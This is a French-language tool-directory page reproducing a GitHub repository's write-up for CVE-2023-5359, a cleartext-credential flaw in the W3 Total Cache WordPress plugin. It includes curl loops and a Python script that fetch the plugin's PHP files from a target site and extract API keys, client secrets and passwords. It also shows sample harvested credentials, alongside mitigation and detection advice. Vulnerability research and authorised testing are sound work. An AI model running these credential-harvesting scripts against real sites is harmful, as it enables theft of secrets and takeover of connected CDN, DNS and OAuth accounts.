Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/enzocipher/cve-2023-5359
Scanners de VulnérabilitésAttaques de Mots de PasseExploitationCollecte d'InformationsSécurité WebApprentissage et Éducation
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

Scanner CVE-2023-5359 pour la vulnérabilité de stockage en texte clair de W3 Total Cache. Détecte les identifiants exposés (clés API, jetons OAuth) dans les fichiers PHP accessibles publiquement. Inclut des scripts d'exploitation manuels et automatisés.

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-5359 - Vulnérabilité de stockage en texte clair de W3 Total Cache

Description

CVE-2023-5359 est une vulnérabilité de stockage en texte clair affectant le plugin WordPress W3 Total Cache dans les versions ≤ 2.7.5. Cette vulnérabilité permet à des attaquants distants d'accéder à des informations d'identification sensibles stockées dans des fichiers PHP non chiffrés et accessibles publiquement.

Sévérité

  • Score CVSS : 7.5 (Élevé)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Type : Exposition d'informations sensibles

Vulnérabilité technique

Cause racine

W3 Total Cache stocke les paramètres de configuration et les identifiants API dans des fichiers PHP situés dans le répertoire /wp-content/plugins/w3-total-cache/ sans protection adéquate. Ces fichiers sont accessibles via HTTP, exposant :

  • Clés API (CloudFlare, Google, etc.)
  • Secrets client
  • Jetons OAuth
  • Identifiants de services externes
  • Fichiers concernés

    root@kitploit:~
    /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
    /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
    /wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
    /wp-content/plugins/w3-total-cache/Config.php
    /wp-content/plugins/w3-total-cache/Cache_File.php
    

    Exploitation

    Méthode manuelle

    root@kitploit:~
    # Vérifier si W3 Total Cache est installé
    curl -s https://target.com/ | grep "w3-total-cache"
    
    # Extraire les identifiants CloudFlare
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"
    
    # Rechercher dans tous les fichiers vulnérables
    for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
        echo "=== $file ==="
        curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
    done
    

    Script automatisé

    root@kitploit:~
    #!/usr/bin/env python3
    import requests
    import re
    
    target = "https://victim.com"
    files = [
        "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
        "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
    ]
    
    for file in files:
        response = requests.get(target + file)
        credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/main/%5B%5E%27%5C%22%5D%2B)", response.text)
        if credentials:
            print(f"[!] Identifiants trouvés dans {file}:")
            for key, value in credentials:
                print(f"    {key}: {value}")
    

    Impact

    Un attaquant peut obtenir :

    1. Identifiants CloudFlare — Prendre le contrôle du CDN et du DNS
    2. Clés API pour services externes — Accéder à des comptes externes
    3. Jetons OAuth — Usurper une identité
    4. Configurations du cache — Manipuler le contenu servi

    Atténuation

    Solution immédiate

    1. Mettez à jour vers W3 Total Cache ≥ 2.7.6
    2. Restreignez l'accès aux fichiers PHP du répertoire des plugins
    3. Révoquez et regénérez tous les identifiants exposés

    Configuration sécurisée

    root@kitploit:~
    # Protection .htaccess
    <Files *.php>
        Deny from all
    </Files>
    <Files "w3-total-cache.php">
        Allow from all
    </Files>
    

    Détection

    Commande de vérification

    root@kitploit:~
    # Vérifier la version vulnérable
    curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
    

    Indicateurs de compromission

    • Activité inhabituelle dans les API externes
    • Modifications des configurations CloudFlare
    • Trafic provenant d'IP non autorisées vers les services connectés

    Exemple de résultat

    root@kitploit:~
    [*] Scan : https://example.com
    [+] W3 Total Cache détecté
    [+] Fichier accessible : /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
    [!] IDENTIFIANTS TROUVÉS :
        client_id: GAxxxxxxxxxxxx78
        client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
    

    Références

    • CVE-2023-5359
    • Journal des modifications de W3 Total Cache
    • Équipe de sécurité WordPress

    Avis juridique

    Ce dépôt est destiné à des fins éducatives et aux tests de pénétration autorisés uniquement. Toute utilisation malveillante de ces informations est strictement interdite.


    Ces informations vous ont-elles été utiles ? Mettez une étoile au dépôt !

    Dernière mise à jour : novembre 2025

    Télécharger l’outil